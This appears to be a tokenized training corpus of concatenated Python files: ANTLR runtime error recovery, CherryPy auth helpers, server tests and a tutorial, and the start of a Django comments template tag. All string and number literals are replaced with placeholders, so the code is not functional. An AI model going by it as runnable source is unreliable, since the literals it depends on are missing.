) <EOL> raise MismatchedTokenException ( ttype , input ) <EOL> def reportError ( self , e ) : <EOL> """<STR_LIT>""" <EOL> if self . _state . errorRecovery : <EOL> return <EOL> self . _state . syntaxErrors += <NUM_LIT:1> <EOL> self . _state . errorRecovery = True <EOL> self . displayRecognitionError ( self . tokenNames , e ) <EOL> def displayRecognitionError ( self , tokenNames , e ) : <EOL> hdr = self . getErrorHeader ( e ) <EOL> msg = self . getErrorMessage ( e , tokenNames ) <EOL> self . emitErrorMessage ( hdr + "<STR_LIT:U+0020>" + msg ) <EOL> def getErrorMessage ( self , e , tokenNames ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( e , UnwantedTokenException ) : <EOL> tokenName = "<STR_LIT>" <EOL> if e . expecting == EOF : <EOL> tokenName = "<STR_LIT>" <EOL> else : <EOL> tokenName = self . tokenNames [ e . expecting ] <EOL> msg = "<STR_LIT>" % ( <EOL> self . getTokenErrorDisplay ( e . getUnexpectedToken ( ) ) , <EOL> tokenName <EOL> ) <EOL> elif isinstance ( e , MissingTokenException ) : <EOL> tokenName = "<STR_LIT>" <EOL> if e . expecting == EOF : <EOL> tokenName = "<STR_LIT>" <EOL> else : <EOL> tokenName = self . tokenNames [ e . expecting ] <EOL> msg = "<STR_LIT>" % ( <EOL> tokenName , self . getTokenErrorDisplay ( e . token ) <EOL> ) <EOL> elif isinstance ( e , MismatchedTokenException ) : <EOL> tokenName = "<STR_LIT>" <EOL> if e . expecting == EOF : <EOL> tokenName = "<STR_LIT>" <EOL> else : <EOL> tokenName = self . tokenNames [ e . expecting ] <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . token ) + "<STR_LIT>" + tokenName <EOL> elif isinstance ( e , MismatchedTreeNodeException ) : <EOL> tokenName = "<STR_LIT>" <EOL> if e . expecting == EOF : <EOL> tokenName = "<STR_LIT>" <EOL> else : <EOL> tokenName = self . tokenNames [ e . expecting ] <EOL> msg = "<STR_LIT>" % ( e . node , tokenName ) <EOL> elif isinstance ( e , NoViableAltException ) : <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . token ) <EOL> elif isinstance ( e , EarlyExitException ) : <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . token ) <EOL> elif isinstance ( e , MismatchedSetException ) : <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . token ) + "<STR_LIT>" + repr ( e . expecting ) <EOL> elif isinstance ( e , MismatchedNotSetException ) : <EOL> msg = "<STR_LIT>" + self . getTokenErrorDisplay ( e . token ) + "<STR_LIT>" + repr ( e . expecting ) <EOL> elif isinstance ( e , FailedPredicateException ) : <EOL> msg = "<STR_LIT>" + e . ruleName + "<STR_LIT>" + e . predicateText + "<STR_LIT>" <EOL> else : <EOL> msg = str ( e ) <EOL> return msg <EOL> def getNumberOfSyntaxErrors ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _state . syntaxErrors <EOL> def getErrorHeader ( self , e ) : <EOL> """<STR_LIT>""" <EOL> return "<STR_LIT>" % ( e . line , e . charPositionInLine ) <EOL> def getTokenErrorDisplay ( self , t ) : <EOL> """<STR_LIT>""" <EOL> s = t . text <EOL> if s is None : <EOL> if t . type == EOF : <EOL> s = "<STR_LIT>" <EOL> else : <EOL> s = "<STR_LIT:<>" + t . type + "<STR_LIT:>>" <EOL> return repr ( s ) <EOL> def emitErrorMessage ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> sys . stderr . write ( msg + '<STR_LIT:\n>' ) <EOL> def recover ( self , input , re ) : <EOL> """<STR_LIT>""" <EOL> if self . _state . lastErrorIndex == input . index ( ) : <EOL> input . consume ( ) <EOL> self . _state . lastErrorIndex = input . index ( ) <EOL> followSet = self . computeErrorRecoverySet ( ) <EOL> self . beginResync ( ) <EOL> self . consumeUntil ( input , followSet ) <EOL> self . endResync ( ) <EOL> def beginResync ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def endResync ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def computeErrorRecoverySet ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . combineFollows ( False ) <EOL> def computeContextSensitiveRuleFOLLOW ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . combineFollows ( True ) <EOL> def combineFollows ( self , exact ) : <EOL> followSet = set ( ) <EOL> for idx , localFollowSet in reversed ( list ( enumerate ( self . _state . following ) ) ) : <EOL> followSet |= localFollowSet <EOL> if exact : <EOL> if EOR_TOKEN_TYPE in localFollowSet : <EOL> if idx > <NUM_LIT:0> : <EOL> followSet . remove ( EOR_TOKEN_TYPE ) <EOL> else : <EOL> break <EOL> return followSet <EOL> def recoverFromMismatchedToken ( self , input , ttype , follow ) : <EOL> """<STR_LIT>""" <EOL> e = None <EOL> if self . mismatchIsUnwantedToken ( input , ttype ) : <EOL> e = UnwantedTokenException ( ttype , input ) <EOL> self . beginResync ( ) <EOL> input . consume ( ) <EOL> self . endResync ( ) <EOL> self . reportError ( e ) <EOL> matchedSymbol = self . getCurrentInputSymbol ( input ) <EOL> input . consume ( ) <EOL> return matchedSymbol <EOL> if self . mismatchIsMissingToken ( input , follow ) : <EOL> inserted = self . getMissingSymbol ( input , e , ttype , follow ) <EOL> e = MissingTokenException ( ttype , input , inserted ) <EOL> self . reportError ( e ) <EOL> return inserted <EOL> e = MismatchedTokenException ( ttype , input ) <EOL> raise e <EOL> def recoverFromMismatchedSet ( self , input , e , follow ) : <EOL> """<STR_LIT>""" <EOL> if self . mismatchIsMissingToken ( input , follow ) : <EOL> self . reportError ( e ) <EOL> return self . getMissingSymbol ( input , e , INVALID_TOKEN_TYPE , follow ) <EOL> raise e <EOL> def getCurrentInputSymbol ( self , input ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def getMissingSymbol ( self , input , e , expectedTokenType , follow ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def consumeUntil ( self , input , tokenTypes ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( tokenTypes , ( set , frozenset ) ) : <EOL> tokenTypes = frozenset ( [ tokenTypes ] ) <EOL> ttype = input . LA ( <NUM_LIT:1> ) <EOL> while ttype != EOF and ttype not in tokenTypes : <EOL> input . consume ( ) <EOL> ttype = input . LA ( <NUM_LIT:1> ) <EOL> def getRuleInvocationStack ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _getRuleInvocationStack ( self . __module__ ) <EOL> def _getRuleInvocationStack ( cls , module ) : <EOL> """<STR_LIT>""" <EOL> rules = [ ] <EOL> for frame in reversed ( inspect . stack ( ) ) : <EOL> code = frame [ <NUM_LIT:0> ] . f_code <EOL> codeMod = inspect . getmodule ( code ) <EOL> if codeMod is None : <EOL> continue <EOL> if codeMod . __name__ != module : <EOL> continue <EOL> if code . co_name in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> continue <EOL> rules . append ( code . co_name ) <EOL> return rules <EOL> _getRuleInvocationStack = classmethod ( _getRuleInvocationStack ) <EOL> def getBacktrackingLevel ( self ) : <EOL> return self . _state . backtracking <EOL> def getGrammarFileName ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . grammarFileName <EOL> def getSourceName ( self ) : <EOL> raise NotImplementedError <EOL> def toStrings ( self , tokens ) : <EOL> """<STR_LIT>""" <EOL> if tokens is None : <EOL> return None <EOL> return [ token . text for token in tokens ] <EOL> def getRuleMemoization ( self , ruleIndex , ruleStartIndex ) : <EOL> """<STR_LIT>""" <EOL> if ruleIndex not in self . _state . ruleMemo : <EOL> self . _state . ruleMemo [ ruleIndex ] = { } <EOL> return self . _state . ruleMemo [ ruleIndex ] . get ( <EOL> ruleStartIndex , self . MEMO_RULE_UNKNOWN <EOL> ) <EOL> def alreadyParsedRule ( self , input , ruleIndex ) : <EOL> """<STR_LIT>""" <EOL> stopIndex = self . getRuleMemoization ( ruleIndex , input . index ( ) ) <EOL> if stopIndex == self . MEMO_RULE_UNKNOWN : <EOL> return False <EOL> if stopIndex == self . MEMO_RULE_FAILED : <EOL> raise BacktrackingFailed <EOL> else : <EOL> input . seek ( stopIndex + <NUM_LIT:1> ) <EOL> return True <EOL> def memoize ( self , input , ruleIndex , ruleStartIndex , success ) : <EOL> """<STR_LIT>""" <EOL> if success : <EOL> stopTokenIndex = input . index ( ) - <NUM_LIT:1> <EOL> else : <EOL> stopTokenIndex = self . MEMO_RULE_FAILED <EOL> if ruleIndex in self . _state . ruleMemo : <EOL> self . _state . ruleMemo [ ruleIndex ] [ ruleStartIndex ] = stopTokenIndex <EOL> def traceIn ( self , ruleName , ruleIndex , inputSymbol ) : <EOL> sys . stdout . write ( "<STR_LIT>" % ( ruleName , inputSymbol ) ) <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> sys . stdout . write ( "<STR_LIT>" % self . _state . backtracking ) <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) <EOL> def traceOut ( self , ruleName , ruleIndex , inputSymbol ) : <EOL> sys . stdout . write ( "<STR_LIT>" % ( ruleName , inputSymbol ) ) <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> sys . stdout . write ( "<STR_LIT>" % self . _state . backtracking ) <EOL> sys . stdout . write ( '<STR_LIT:\n>' ) <EOL> class TokenSource ( object ) : <EOL> """<STR_LIT>""" <EOL> def nextToken ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def __iter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self <EOL> def next ( self ) : <EOL> """<STR_LIT>""" <EOL> token = self . nextToken ( ) <EOL> if token is None or token . type == EOF : <EOL> raise StopIteration <EOL> return token <EOL> class Lexer ( BaseRecognizer , TokenSource ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , input , state = None ) : <EOL> BaseRecognizer . __init__ ( self , state ) <EOL> TokenSource . __init__ ( self ) <EOL> self . input = input <EOL> def reset ( self ) : <EOL> BaseRecognizer . reset ( self ) <EOL> if self . input is not None : <EOL> self . input . seek ( <NUM_LIT:0> ) <EOL> if self . _state is None : <EOL> return <EOL> self . _state . token = None <EOL> self . _state . type = INVALID_TOKEN_TYPE <EOL> self . _state . channel = DEFAULT_CHANNEL <EOL> self . _state . tokenStartCharIndex = - <NUM_LIT:1> <EOL> self . _state . tokenStartLine = - <NUM_LIT:1> <EOL> self . _state . tokenStartCharPositionInLine = - <NUM_LIT:1> <EOL> self . _state . text = None <EOL> def nextToken ( self ) : <EOL> """<STR_LIT>""" <EOL> while <NUM_LIT:1> : <EOL> self . _state . token = None <EOL> self . _state . channel = DEFAULT_CHANNEL <EOL> self . _state . tokenStartCharIndex = self . input . index ( ) <EOL> self . _state . tokenStartCharPositionInLine = self . input . charPositionInLine <EOL> self . _state . tokenStartLine = self . input . line <EOL> self . _state . text = None <EOL> if self . input . LA ( <NUM_LIT:1> ) == EOF : <EOL> return EOF_TOKEN <EOL> try : <EOL> self . mTokens ( ) <EOL> if self . _state . token is None : <EOL> self . emit ( ) <EOL> elif self . _state . token == SKIP_TOKEN : <EOL> continue <EOL> return self . _state . token <EOL> except NoViableAltException , re : <EOL> self . reportError ( re ) <EOL> self . recover ( re ) <EOL> except RecognitionException , re : <EOL> self . reportError ( re ) <EOL> def skip ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _state . token = SKIP_TOKEN <EOL> def mTokens ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def setCharStream ( self , input ) : <EOL> """<STR_LIT>""" <EOL> self . input = None <EOL> self . reset ( ) <EOL> self . input = input <EOL> def getSourceName ( self ) : <EOL> return self . input . getSourceName ( ) <EOL> def emit ( self , token = None ) : <EOL> """<STR_LIT>""" <EOL> if token is None : <EOL> token = CommonToken ( <EOL> input = self . input , <EOL> type = self . _state . type , <EOL> channel = self . _state . channel , <EOL> start = self . _state . tokenStartCharIndex , <EOL> stop = self . getCharIndex ( ) - <NUM_LIT:1> <EOL> ) <EOL> token . line = self . _state . tokenStartLine <EOL> token . text = self . _state . text <EOL> token . charPositionInLine = self . _state . tokenStartCharPositionInLine <EOL> self . _state . token = token <EOL> return token <EOL> def match ( self , s ) : <EOL> if isinstance ( s , basestring ) : <EOL> for c in s : <EOL> if self . input . LA ( <NUM_LIT:1> ) != ord ( c ) : <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> raise BacktrackingFailed <EOL> mte = MismatchedTokenException ( c , self . input ) <EOL> self . recover ( mte ) <EOL> raise mte <EOL> self . input . consume ( ) <EOL> else : <EOL> if self . input . LA ( <NUM_LIT:1> ) != s : <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> raise BacktrackingFailed <EOL> mte = MismatchedTokenException ( unichr ( s ) , self . input ) <EOL> self . recover ( mte ) <EOL> raise mte <EOL> self . input . consume ( ) <EOL> def matchAny ( self ) : <EOL> self . input . consume ( ) <EOL> def matchRange ( self , a , b ) : <EOL> if self . input . LA ( <NUM_LIT:1> ) < a or self . input . LA ( <NUM_LIT:1> ) > b : <EOL> if self . _state . backtracking > <NUM_LIT:0> : <EOL> raise BacktrackingFailed <EOL> mre = MismatchedRangeException ( unichr ( a ) , unichr ( b ) , self . input ) <EOL> self . recover ( mre ) <EOL> raise mre <EOL> self . input . consume ( ) <EOL> def getLine ( self ) : <EOL> return self . input . line <EOL> def getCharPositionInLine ( self ) : <EOL> return self . input . charPositionInLine <EOL> def getCharIndex ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . input . index ( ) <EOL> def getText ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _state . text is not None : <EOL> return self . _state . text <EOL> return self . input . substring ( <EOL> self . _state . tokenStartCharIndex , <EOL> self . getCharIndex ( ) - <NUM_LIT:1> <EOL> ) <EOL> def setText ( self , text ) : <EOL> """<STR_LIT>""" <EOL> self . _state . text = text <EOL> text = property ( getText , setText ) <EOL> def reportError ( self , e ) : <EOL> self . displayRecognitionError ( self . tokenNames , e ) <EOL> def getErrorMessage ( self , e , tokenNames ) : <EOL> msg = None <EOL> if isinstance ( e , MismatchedTokenException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) + "<STR_LIT>" + self . getCharErrorDisplay ( e . expecting ) <EOL> elif isinstance ( e , NoViableAltException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) <EOL> elif isinstance ( e , EarlyExitException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) <EOL> elif isinstance ( e , MismatchedNotSetException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) + "<STR_LIT>" + repr ( e . expecting ) <EOL> elif isinstance ( e , MismatchedSetException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) + "<STR_LIT>" + repr ( e . expecting ) <EOL> elif isinstance ( e , MismatchedRangeException ) : <EOL> msg = "<STR_LIT>" + self . getCharErrorDisplay ( e . c ) + "<STR_LIT>" + self . getCharErrorDisplay ( e . a ) + "<STR_LIT:..>" + self . getCharErrorDisplay ( e . b ) <EOL> else : <EOL> msg = BaseRecognizer . getErrorMessage ( self , e , tokenNames ) <EOL> return msg <EOL> def getCharErrorDisplay ( self , c ) : <EOL> if c == EOF : <EOL> c = '<STR_LIT>' <EOL> return repr ( c ) <EOL> def recover ( self , re ) : <EOL> """<STR_LIT>""" <EOL> self . input . consume ( ) <EOL> def traceIn ( self , ruleName , ruleIndex ) : <EOL> inputSymbol = "<STR_LIT>" % ( self . input . LT ( <NUM_LIT:1> ) , <EOL> self . getLine ( ) , <EOL> self . getCharPositionInLine ( ) <EOL> ) <EOL> BaseRecognizer . traceIn ( self , ruleName , ruleIndex , inputSymbol ) <EOL> def traceOut ( self , ruleName , ruleIndex ) : <EOL> inputSymbol = "<STR_LIT>" % ( self . input . LT ( <NUM_LIT:1> ) , <EOL> self . getLine ( ) , <EOL> self . getCharPositionInLine ( ) <EOL> ) <EOL> BaseRecognizer . traceOut ( self , ruleName , ruleIndex , inputSymbol ) <EOL> class Parser ( BaseRecognizer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , lexer , state = None ) : <EOL> BaseRecognizer . __init__ ( self , state ) <EOL> self . setTokenStream ( lexer ) <EOL> def reset ( self ) : <EOL> BaseRecognizer . reset ( self ) <EOL> if self . input is not None : <EOL> self . input . seek ( <NUM_LIT:0> ) <EOL> def getCurrentInputSymbol ( self , input ) : <EOL> return input . LT ( <NUM_LIT:1> ) <EOL> def getMissingSymbol ( self , input , e , expectedTokenType , follow ) : <EOL> if expectedTokenType == EOF : <EOL> tokenText = "<STR_LIT>" <EOL> else : <EOL> tokenText = "<STR_LIT>" + self . tokenNames [ expectedTokenType ] + "<STR_LIT:>>" <EOL> t = CommonToken ( type = expectedTokenType , text = tokenText ) <EOL> current = input . LT ( <NUM_LIT:1> ) <EOL> if current . type == EOF : <EOL> current = input . LT ( - <NUM_LIT:1> ) <EOL> if current is not None : <EOL> t . line = current . line <EOL> t . charPositionInLine = current . charPositionInLine <EOL> t . channel = DEFAULT_CHANNEL <EOL> return t <EOL> def setTokenStream ( self , input ) : <EOL> """<STR_LIT>""" <EOL> self . input = None <EOL> self . reset ( ) <EOL> self . input = input <EOL> def getTokenStream ( self ) : <EOL> return self . input <EOL> def getSourceName ( self ) : <EOL> return self . input . getSourceName ( ) <EOL> def traceIn ( self , ruleName , ruleIndex ) : <EOL> BaseRecognizer . traceIn ( self , ruleName , ruleIndex , self . input . LT ( <NUM_LIT:1> ) ) <EOL> def traceOut ( self , ruleName , ruleIndex ) : <EOL> BaseRecognizer . traceOut ( self , ruleName , ruleIndex , self . input . LT ( <NUM_LIT:1> ) ) <EOL> class RuleReturnScope ( object ) : <EOL> """<STR_LIT>""" <EOL> def getStart ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def getStop ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def getTree ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def getTemplate ( self ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> class ParserRuleReturnScope ( RuleReturnScope ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . start = None <EOL> self . stop = None <EOL> def getStart ( self ) : <EOL> return self . start <EOL> def getStop ( self ) : <EOL> return self . stop </s>
<s> import cherrypy <EOL> from cherrypy . lib import httpauth <EOL> def check_auth ( users , encrypt = None , realm = None ) : <EOL> """<STR_LIT>""" <EOL> request = cherrypy . serving . request <EOL> if '<STR_LIT>' in request . headers : <EOL> ah = httpauth . parseAuthorization ( request . headers [ '<STR_LIT>' ] ) <EOL> if ah is None : <EOL> raise cherrypy . HTTPError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> if not encrypt : <EOL> encrypt = httpauth . DIGEST_AUTH_ENCODERS [ httpauth . MD5 ] <EOL> if hasattr ( users , '<STR_LIT>' ) : <EOL> try : <EOL> users = users ( ) <EOL> if not isinstance ( users , dict ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> password = users . get ( ah [ "<STR_LIT:username>" ] , None ) <EOL> except TypeError : <EOL> password = users ( ah [ "<STR_LIT:username>" ] ) <EOL> else : <EOL> if not isinstance ( users , dict ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> password = users . get ( ah [ "<STR_LIT:username>" ] , None ) <EOL> if httpauth . checkResponse ( ah , password , method = request . method , <EOL> encrypt = encrypt , realm = realm ) : <EOL> request . login = ah [ "<STR_LIT:username>" ] <EOL> return True <EOL> request . login = False <EOL> return False <EOL> def basic_auth ( realm , users , encrypt = None , debug = False ) : <EOL> """<STR_LIT>""" <EOL> if check_auth ( users , encrypt ) : <EOL> if debug : <EOL> cherrypy . log ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return <EOL> cherrypy . serving . response . headers [ '<STR_LIT>' ] = httpauth . basicAuth ( realm ) <EOL> raise cherrypy . HTTPError ( <NUM_LIT> , "<STR_LIT>" ) <EOL> def digest_auth ( realm , users , debug = False ) : <EOL> """<STR_LIT>""" <EOL> if check_auth ( users , realm = realm ) : <EOL> if debug : <EOL> cherrypy . log ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> return <EOL> cherrypy . serving . response . headers [ '<STR_LIT>' ] = httpauth . digestAuth ( realm ) <EOL> raise cherrypy . HTTPError ( <NUM_LIT> , "<STR_LIT>" ) </s>
<s> import os <EOL> import sys <EOL> import time <EOL> starttime = time . time ( ) <EOL> import cherrypy <EOL> class Root : <EOL> def index ( self ) : <EOL> return "<STR_LIT>" <EOL> index . exposed = True <EOL> def mtimes ( self ) : <EOL> return repr ( cherrypy . engine . publish ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> mtimes . exposed = True <EOL> def pid ( self ) : <EOL> return str ( os . getpid ( ) ) <EOL> pid . exposed = True <EOL> def start ( self ) : <EOL> return repr ( starttime ) <EOL> start . exposed = True <EOL> def exit ( self ) : <EOL> cherrypy . engine . wait ( state = cherrypy . engine . states . STARTED ) <EOL> cherrypy . engine . exit ( ) <EOL> exit . exposed = True <EOL> def unsub_sig ( ) : <EOL> cherrypy . log ( "<STR_LIT>" % cherrypy . config . get ( '<STR_LIT>' , False ) ) <EOL> if cherrypy . config . get ( '<STR_LIT>' , False ) : <EOL> cherrypy . log ( "<STR_LIT>" ) <EOL> cherrypy . engine . signal_handler . unsubscribe ( ) <EOL> try : <EOL> from signal import signal , SIGTERM <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> def old_term_handler ( signum = None , frame = None ) : <EOL> cherrypy . log ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> cherrypy . log ( "<STR_LIT>" ) <EOL> signal ( SIGTERM , old_term_handler ) <EOL> cherrypy . engine . subscribe ( '<STR_LIT:start>' , unsub_sig , priority = <NUM_LIT:100> ) <EOL> def starterror ( ) : <EOL> if cherrypy . config . get ( '<STR_LIT>' , False ) : <EOL> zerodiv = <NUM_LIT:1> / <NUM_LIT:0> <EOL> cherrypy . engine . subscribe ( '<STR_LIT:start>' , starterror , priority = <NUM_LIT:6> ) <EOL> def log_test_case_name ( ) : <EOL> if cherrypy . config . get ( '<STR_LIT>' , False ) : <EOL> cherrypy . log ( "<STR_LIT>" % cherrypy . config . get ( '<STR_LIT>' ) ) <EOL> cherrypy . engine . subscribe ( '<STR_LIT:start>' , log_test_case_name , priority = <NUM_LIT:6> ) <EOL> cherrypy . tree . mount ( Root ( ) , '<STR_LIT:/>' , { '<STR_LIT:/>' : { } } ) </s>
<s> """<STR_LIT>""" <EOL> import cherrypy <EOL> from cherrypy . _cpcompat import ntob , ntou , sorted <EOL> def setup_server ( ) : <EOL> class Root : <EOL> def multipart ( self , parts ) : <EOL> return repr ( parts ) <EOL> multipart . exposed = True <EOL> def multipart_form_data ( self , ** kwargs ) : <EOL> return repr ( list ( sorted ( kwargs . items ( ) ) ) ) <EOL> multipart_form_data . exposed = True <EOL> def flashupload ( self , Filedata , Upload , Filename ) : <EOL> return ( "<STR_LIT>" % <EOL> ( Upload , Filename , Filedata . file . read ( ) ) ) <EOL> flashupload . exposed = True <EOL> cherrypy . config . update ( { '<STR_LIT>' : <NUM_LIT:0> } ) <EOL> cherrypy . tree . mount ( Root ( ) ) <EOL> from cherrypy . test import helper <EOL> class MultipartTest ( helper . CPWebCase ) : <EOL> setup_server = staticmethod ( setup_server ) <EOL> def test_multipart ( self ) : <EOL> text_part = ntou ( "<STR_LIT>" ) <EOL> html_part = ntou ( """<STR_LIT>""" ) <EOL> body = '<STR_LIT:\r\n>' . join ( [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> text_part , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> html_part , <EOL> "<STR_LIT>" ] ) <EOL> headers = [ <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , str ( len ( body ) ) ) , <EOL> ] <EOL> self . getPage ( '<STR_LIT>' , headers , "<STR_LIT:POST>" , body ) <EOL> self . assertBody ( repr ( [ text_part , html_part ] ) ) <EOL> def test_multipart_form_data ( self ) : <EOL> body = '<STR_LIT:\r\n>' . join ( [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:bar>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) <EOL> self . getPage ( '<STR_LIT>' , method = '<STR_LIT:POST>' , <EOL> headers = [ ( "<STR_LIT:Content-Type>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , str ( len ( body ) ) ) , <EOL> ] , <EOL> body = body ) , <EOL> self . assertBody ( repr ( [ ( '<STR_LIT>' , [ ntou ( '<STR_LIT>' ) , ntou ( '<STR_LIT>' ) ] ) , ( '<STR_LIT:foo>' , ntou ( '<STR_LIT:bar>' ) ) ] ) ) <EOL> class SafeMultipartHandlingTest ( helper . CPWebCase ) : <EOL> setup_server = staticmethod ( setup_server ) <EOL> def test_Flash_Upload ( self ) : <EOL> headers = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:Content-Type>' , '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> filedata = ntob ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> body = ( ntob ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:\r\n>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:\r\n>' ) <EOL> + filedata + <EOL> ntob ( '<STR_LIT:\r\n>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT:\r\n>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) ) <EOL> self . getPage ( '<STR_LIT>' , headers , "<STR_LIT:POST>" , body ) <EOL> self . assertBody ( "<STR_LIT>" <EOL> "<STR_LIT>" % filedata ) </s>
<s> """<STR_LIT>""" <EOL> import cherrypy <EOL> class GeneratorDemo : <EOL> def header ( self ) : <EOL> return "<STR_LIT>" <EOL> def footer ( self ) : <EOL> return "<STR_LIT>" <EOL> def index ( self ) : <EOL> users = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> yield self . header ( ) <EOL> yield "<STR_LIT>" <EOL> for user in users : <EOL> yield "<STR_LIT>" % user <EOL> yield self . footer ( ) <EOL> index . exposed = True <EOL> import os . path <EOL> tutconf = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> cherrypy . quickstart ( GeneratorDemo ( ) , config = tutconf ) <EOL> else : <EOL> cherrypy . tree . mount ( GeneratorDemo ( ) , config = tutconf ) </s>
<s> from django . conf . urls . defaults import * <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> ( r'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) </s>
<s> from django . contrib . comments . models import Comment , FreeComment <EOL> from django . contrib . comments . models import PHOTOS_REQUIRED , PHOTOS_OPTIONAL , RATINGS_REQUIRED , RATINGS_OPTIONAL , IS_PUBLIC <EOL> from django . contrib . comments . models import MIN_PHOTO_DIMENSION , MAX_PHOTO_DIMENSION <EOL> from django import template <EOL> from django . template import loader <EOL> from django . core . exceptions import ObjectDoesNotExist <EOL> from django . contrib . contenttypes . models import ContentType <EOL> import re <EOL> register = template . Library ( ) <EOL> COMMENT_FORM = '<STR_LIT>' <EOL> FREE_COMMENT_FORM = '<STR_LIT>' <EOL> class CommentFormNode ( template . Node ) : <EOL> def __init__ ( self , content_type , obj_id_lookup_var , obj_id , free , <EOL> photos_optional = False , photos_required = False , photo_options = '<STR_LIT>' , <EOL> ratings_optional = False , ratings_required = False , rating_options = '<STR_LIT>' , <EOL> is_public = True ) : <EOL> self . content_type = content_type <EOL> self . obj_id_lookup_var , self . obj_id , self . free = obj_id_lookup_var , obj_id , free <EOL> self . photos_optional , self . photos_required = photos_optional , photos_required <EOL> self . ratings_optional , self . ratings_required = ratings_optional , ratings_required <EOL> self . photo_options , self . rating_options = photo_options , rating_options <EOL> self . is_public = is_public <EOL> def render ( self , context ) : <EOL> from django . utils . text import normalize_newlines <EOL> import base64 <EOL> context . push ( ) <EOL> if self . obj_id_lookup_var is not None : <EOL> try : <EOL> self . obj_id = template . resolve_variable ( self . obj_id_lookup_var , context ) <EOL> except template . VariableDoesNotExist : <EOL> return '<STR_LIT>' <EOL> try : <EOL> self . content_type . get_object_for_this_type ( pk = self . obj_id ) <EOL> except ObjectDoesNotExist : <EOL> context [ '<STR_LIT>' ] = False <EOL> else : <EOL> context [ '<STR_LIT>' ] = True <EOL> else : <EOL> context [ '<STR_LIT>' ] = True <EOL> context [ '<STR_LIT:target>' ] = '<STR_LIT>' % ( self . content_type . id , self . obj_id ) <EOL> options = [ ] <EOL> for var , abbr in ( ( '<STR_LIT>' , PHOTOS_REQUIRED ) , 